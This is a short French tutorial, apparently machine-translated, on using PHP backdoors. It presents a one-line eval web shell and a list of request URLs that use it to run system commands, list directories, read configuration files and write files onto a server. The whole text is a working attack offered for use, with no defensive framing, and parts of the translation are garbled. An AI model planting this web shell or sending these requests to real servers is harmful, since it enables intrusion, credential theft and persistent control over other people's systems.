Aujourd'hui, nous allons parler de certaines des utilisations les plus courantes des portes dérobées en PHP.
Tout d'abord, écrivez la porte dérobée la plus simple, qui peut également être appelée cheval de Troie.
<?php eval($_GET['evl']);
Ça y est, vous avez gagné beaucoup de permissions d'exécution sur ce serveur.
Quelles sont les utilisations de cette scène ?
Serveur d'impressionphpinfo
http://www.test.com/a.php?evl=phpinfo()
Vérifiez quels fichiers se trouvent dans un répertoire
http://www.test.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));
Vérifiez si le répertoire est accessible en écriture, puis vous pourrez vérifier l'écriture Créer un fichier exécutable dans le répertoire
http://www.test.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));
Récupérer le contenu d'un fichier, généralement utilisé pour lire la configuration
http://www.test.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));
Écrire des fichiers dans un répertoire inscriptible
http://www.test.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));
D'accord, ce qui précède part a fondamentalement détruit la partie qui peut compléter la visualisation d'un serveur. Essayons de tirer des conclusions sur d'autres fonctions.
Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!